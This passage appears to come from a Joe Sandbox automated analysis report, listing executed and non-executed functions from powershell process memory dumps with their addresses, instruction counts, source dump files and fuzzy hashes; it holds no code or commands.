                                                                                                    • Opcode Fuzzy Hash: a216432190955116dcf0ff82557d6ed2aa17512a3a905e6a93f6aa3158f40e8e
                                                                                                    • Instruction Fuzzy Hash: 78E0D833E0D82E5EEBA5B55C25181FC62D1FF5467178801B7D91DD3281EC049C118795

                                                                                                    Executed Functions

                                                                                                    Function 00007FF8477C1F8A Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2445494218.00007FF8477C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ff8477c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: mr[H
                                                                                                    • API String ID: 0-2654273985
                                                                                                    • Opcode ID: 0abf32d5e7b88f55e5dc298484d89ebc44162b4c5f8bab0998cda8fcebdbdbb8
                                                                                                    • Instruction ID: 64431a9087574b1cf689f44c8866761bba3640338b46c8c1a394f55db44a2dda
                                                                                                    • Opcode Fuzzy Hash: 0abf32d5e7b88f55e5dc298484d89ebc44162b4c5f8bab0998cda8fcebdbdbb8
                                                                                                    • Instruction Fuzzy Hash: 0621F362D0EACA8FF38AAA7C58551783BE1FF1A2D074900FBD548CB1E3DD085C4A8325
                                                                                                    Function 00007FF8476FFC47 Relevance: .8, Instructions: 821COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2444240038.00007FF8476F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ff8476f0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 84bf19f41643cd442c3a85869980f507c5e61be6ce759dcc183f99dbf573ec4f
                                                                                                    • Instruction ID: ae73a4ddb5c08e29b1213c7d35a729084bf896051fbf0ce067dad65f1eae4eaf
                                                                                                    • Opcode Fuzzy Hash: 84bf19f41643cd442c3a85869980f507c5e61be6ce759dcc183f99dbf573ec4f
                                                                                                    • Instruction Fuzzy Hash: 1812D430A1CA898FDB84EF1CC485AED7BE1FFA9354F54056ED449C7296DA34E842CB81
                                                                                                    Function 00007FF8477C1597 Relevance: .6, Instructions: 631COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2445494218.00007FF8477C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ff8477c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5b8233e20c4ee13e95c6eede755041551cab3b2946771855ea7de7ab666e101a
                                                                                                    • Instruction ID: 4610608388abbe382008d08e3e73f66fceefbdb7932fb275e1d4bef6dd7c6830
                                                                                                    • Opcode Fuzzy Hash: 5b8233e20c4ee13e95c6eede755041551cab3b2946771855ea7de7ab666e101a
                                                                                                    • Instruction Fuzzy Hash: 89122561E0EB8A9FE799AA2858511BC7BE1FF5A790F4801FAD40CC71D3DD18AC468346
                                                                                                    Function 00007FF8477C1748 Relevance: .5, Instructions: 529COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2445494218.00007FF8477C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ff8477c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cf619817c7f245f7be5e7cb4bf4f84361c0cc72a721564af833dd53f12cda906
                                                                                                    • Instruction ID: 98fd3fff77cb690fa45615ad7f61d9372618573279955cdc1b0e7a9070f368c6
                                                                                                    • Opcode Fuzzy Hash: cf619817c7f245f7be5e7cb4bf4f84361c0cc72a721564af833dd53f12cda906
                                                                                                    • Instruction Fuzzy Hash: D3020271E0DA8A9FE799AA2858511BC77E1FF5A790F4801FAD40DC71C3DD28AC468346
                                                                                                    Function 00007FF8477C9539 Relevance: .4, Instructions: 388COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2445494218.00007FF8477C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ff8477c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 29ec7558d8e4bba84043bc8d3f2efe2e6878f3dcebf2ea5a6554b88d7f2f5af4
                                                                                                    • Instruction ID: 2e8f61ea73ab1a14b73321595e29f3859f85b8703b135dc0ed7bf1fc125406cc
                                                                                                    • Opcode Fuzzy Hash: 29ec7558d8e4bba84043bc8d3f2efe2e6878f3dcebf2ea5a6554b88d7f2f5af4
                                                                                                    • Instruction Fuzzy Hash: 49C15531E0DA898FE7D5AF2858551B87BE1FF5A394F4801BEC84DC71D3DA18A8068B46
                                                                                                    Function 00007FF8477CA6F2 Relevance: .4, Instructions: 382COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2445494218.00007FF8477C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ff8477c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3bdf122a94220ae0da6c2cc0b090a290004daad27bdd8922a3008ee4adc5a2b0
                                                                                                    • Instruction ID: e4ccae163f301b1551fca224106069066f9fb7731f113153ef4f5b5aad4063b8
                                                                                                    • Opcode Fuzzy Hash: 3bdf122a94220ae0da6c2cc0b090a290004daad27bdd8922a3008ee4adc5a2b0
                                                                                                    • Instruction Fuzzy Hash: 98B15921E0EB8A8FE7AAA72818551B97BE1FF5A391B4A00FFC44DC71D3DD089C468355
                                                                                                    Function 00007FF8477C0D99 Relevance: .3, Instructions: 312COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2445494218.00007FF8477C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ff8477c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bc27bdeb1faee04ac964ff3f63a6048b19395368d39fafda85e9a7b2beaf999e
                                                                                                    • Instruction ID: 449dbe535c517e8b273d2348a8cca59df65f0700e6f9cf06379b6f64fdc3e5b0
                                                                                                    • Opcode Fuzzy Hash: bc27bdeb1faee04ac964ff3f63a6048b19395368d39fafda85e9a7b2beaf999e
                                                                                                    • Instruction Fuzzy Hash: 26912631E0DA4A8FE799EA2C98956BD37D1EF49750F8805BAD80DC30D3DE18AC42C385
                                                                                                    Function 00007FF8477CA06A Relevance: .3, Instructions: 299COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2445494218.00007FF8477C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ff8477c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6b31095b13f523eef20a5048260c56addd2e508b90f50fa91b493c4a4a0cbcc4
                                                                                                    • Instruction ID: 8b071e0e655495a39e03f02a25da4001eab58f51032057558c3f88052ed2f023
                                                                                                    • Opcode Fuzzy Hash: 6b31095b13f523eef20a5048260c56addd2e508b90f50fa91b493c4a4a0cbcc4
                                                                                                    • Instruction Fuzzy Hash: 01915731E0DA898FE7A6AB2C58552B97BE0EF4A391B4905FBD44DC70D3EE189C06C351
                                                                                                    Function 00007FF8477CA2EA Relevance: .3, Instructions: 293COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2445494218.00007FF8477C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ff8477c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e19eb73787fd1059a24aaf31a5c9a80263d3d9e20c021e173594426b98b2f02c
                                                                                                    • Instruction ID: 4c09cc032e4ad763c0ed2cc28d77b14d16338064236b000166f6031c39b7e151
                                                                                                    • Opcode Fuzzy Hash: e19eb73787fd1059a24aaf31a5c9a80263d3d9e20c021e173594426b98b2f02c
                                                                                                    • Instruction Fuzzy Hash: 5B814831E0EA898FE7A6EB2C58645B97BE0EF5A391B4900FBD44DC7093DD18AC06C355
                                                                                                    Function 00007FF8477CA77A Relevance: .1, Instructions: 142COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2445494218.00007FF8477C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ff8477c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 793c53d4c0058a60434ff8f94d6c996c8a0703896ca21381a8245b820dfed130
                                                                                                    • Instruction ID: 06022fff1de115b3776e274fa2cdcb45d28fde1a57e652f60e3153d74457fd44
                                                                                                    • Opcode Fuzzy Hash: 793c53d4c0058a60434ff8f94d6c996c8a0703896ca21381a8245b820dfed130
                                                                                                    • Instruction Fuzzy Hash: B5410422E1EE879FF7AAA628055527C76E2FF596D2BC900BAC80DC31D3DD0C9C464315
                                                                                                    Function 00007FF8477CB18B Relevance: .1, Instructions: 130COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2445494218.00007FF8477C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ff8477c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 00a66380c4ada959ace8b6d0b345d893396d9f41be37fb522831c20ff6af621b
                                                                                                    • Instruction ID: 9c535e438f5db3f377ed095b14bbf8005db538ff44c2dd03e26c7f2c4b0a39be
                                                                                                    • Opcode Fuzzy Hash: 00a66380c4ada959ace8b6d0b345d893396d9f41be37fb522831c20ff6af621b
                                                                                                    • Instruction Fuzzy Hash: 2A41A29694E7C95FE3939B781C691A93FA4DF2725474800EFE4D8CB1E3D808191AC326
                                                                                                    Function 00007FF8477C15C3 Relevance: .1, Instructions: 100COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2445494218.00007FF8477C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ff8477c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e713dbf8f5d5f5da46056eddae870e899ece2a0a375150933b897423a5f6efaf
                                                                                                    • Instruction ID: e1d7e1d87c80b78e6d3964f7e97ac399821a7cbd16e19d3f2dd15d8da787be01
                                                                                                    • Opcode Fuzzy Hash: e713dbf8f5d5f5da46056eddae870e899ece2a0a375150933b897423a5f6efaf
                                                                                                    • Instruction Fuzzy Hash: 6C310361E0EA8A9FF7A9AA28685027877E1EF093D4F8805FAD84DC71C3DD0D9C858351
                                                                                                    Function 00007FF8477C0E87 Relevance: .1, Instructions: 78COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2445494218.00007FF8477C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ff8477c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 53e13a185bedb277c60c6bf89ab8cba0f1461ed416085591ac1866b7cbc075fe
                                                                                                    • Instruction ID: fa9fa7fae1da9ad0fb237a09d25b0d62e53a87d76cb8e875fb69221ef0796278
                                                                                                    • Opcode Fuzzy Hash: 53e13a185bedb277c60c6bf89ab8cba0f1461ed416085591ac1866b7cbc075fe
                                                                                                    • Instruction Fuzzy Hash: EC11B632E5D90FCEF6A8B61C68561BD62D1EF48691BD84AB5DC0EC31C2DE18AC4285C9
                                                                                                    Function 00007FF8476F4B55 Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2444240038.00007FF8476F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ff8476f0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 14519e921102746a586ca7a2ccba9c94f822801dd3536a8d90bbab63678df340
                                                                                                    • Instruction ID: d350aeba02028b1d30d839febae015457386e7d6b3167e9f536edc403dd3af8e
                                                                                                    • Opcode Fuzzy Hash: 14519e921102746a586ca7a2ccba9c94f822801dd3536a8d90bbab63678df340
                                                                                                    • Instruction Fuzzy Hash: 1E01A73010CB0C8FDB44EF0CE051AA5B7E0FB85364F10056DE58AC3665D632E882CB45
                                                                                                    Function 00007FF8476F4BC8 Relevance: .0, Instructions: 48COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2444240038.00007FF8476F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ff8476f0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 628f3aca7835169ab59b85efe253ff5b13f2c7c07e5bddeb324accfac027cc5d
                                                                                                    • Instruction ID: 3c50da78d4fb1dee4eb4a8501a26cfa7b6ed89298a67f6b1f02836cde03a0c21
                                                                                                    • Opcode Fuzzy Hash: 628f3aca7835169ab59b85efe253ff5b13f2c7c07e5bddeb324accfac027cc5d
                                                                                                    • Instruction Fuzzy Hash: 5201A23280E3C14FE71A9B68AC525E4BFA0EF1327471802EBD0C5CA4E7D51A5887C792

                                                                                                    Non-executed Functions

                                                                                                    Function 00007FF8476F2478 Relevance: .2, Instructions: 156COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2444240038.00007FF8476F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ff8476f0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fd3c0b1dc3fc8be68ca7dd6a591492beb6974fda5a7ec5da4184831276a02b9c
                                                                                                    • Instruction ID: 81cdc2f7176b0c39e607ebf2d837bfdf2f7845f0e95b101c160aab5eba70e914
                                                                                                    • Opcode Fuzzy Hash: fd3c0b1dc3fc8be68ca7dd6a591492beb6974fda5a7ec5da4184831276a02b9c
                                                                                                    • Instruction Fuzzy Hash: 0D416456E0E7C25EE713A73D68651ED3FA1EF536B5B0900F7C1948B0D3E909184A8726
                                                                                                    Function 00007FF8476F84FA Relevance: 5.1, Strings: 4, Instructions: 90COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2444240038.00007FF8476F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ff8476f0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: N_^$N_^$N_^$N_^
                                                                                                    • API String ID: 0-3900292545
                                                                                                    • Opcode ID: a9d3b5e4b7e72c2b54f0f9e1f50636c21494e7c9ca66f39ecf47d4e794e0836e
                                                                                                    • Instruction ID: a53484b80b7f5b842ccaca7107dc296a05b150e421f48490f118e5e46df3caa3
                                                                                                    • Opcode Fuzzy Hash: a9d3b5e4b7e72c2b54f0f9e1f50636c21494e7c9ca66f39ecf47d4e794e0836e
                                                                                                    • Instruction Fuzzy Hash: 7C21D4B3F0D5838FD3479B2D9CA20A87B91FF6665831D01F9C19D8B193ED24A4074246